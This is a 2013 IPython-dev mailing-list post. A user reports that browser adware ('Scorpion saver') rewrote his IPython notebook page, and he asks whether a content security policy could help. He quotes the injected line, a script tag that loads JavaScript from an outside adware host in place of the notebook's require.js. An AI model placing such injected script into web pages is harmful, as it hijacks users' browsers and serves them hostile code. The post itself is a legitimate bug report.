[IPython-dev] Scorpion saver hijacked my Ipython notebook..
Toby Burnett
tburnett at myuw.net
Tue Dec 31 20:27:52 EST 2013
For the second time. When It got it several weeks ago, I thought that I had eliminated it after half a day of struggles.
The immediate symptom is that the IPython notebook, as served from my Linux compute server, is suddenly is a blank screen. The reason is that the HTML is modified by the browser: this is the first few lines:
<!DOCTYPE HTML>
<html>
<head><script type="text/javascript" id="2f2a695a6afce2c2d833c706cd677a8e" src="http://d.lqw.me/xuiow/?o=2&g=87020BB1-5E15-E06B-C4B6-FDE07558008A&s=F5D333A8-C748-4686-AE0A-9E008F670C22&z=1387546177"></script>
<meta charset="utf-8">
<title>IPython Notebook</title>
The script src property is modified in a way that is very hard to fix. (This is Chrome, but IE has the same issue.) It should be
<script src="/static/components/requirejs/require.js" type="text/javascript" charset="utf-8"></script>
I'll try to get rid of it again, but might have to make a clean install, ugh.
When looking into how this can happen, and what safeguards there might me, I came across the idea of a "content security policy" that a web site could implement, and would, I think, at least give a warning about this:
https://developer.chrome.com/extensions/contentSecurityPolicy.html
Any thoughts/suggestions welcomed.
--Toby Burnett
(And Happy New Year to the team!)
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.python.org/pipermail/ipython-dev/attachments/20140101/453425c4/attachment.html>
More information about the IPython-dev
mailing list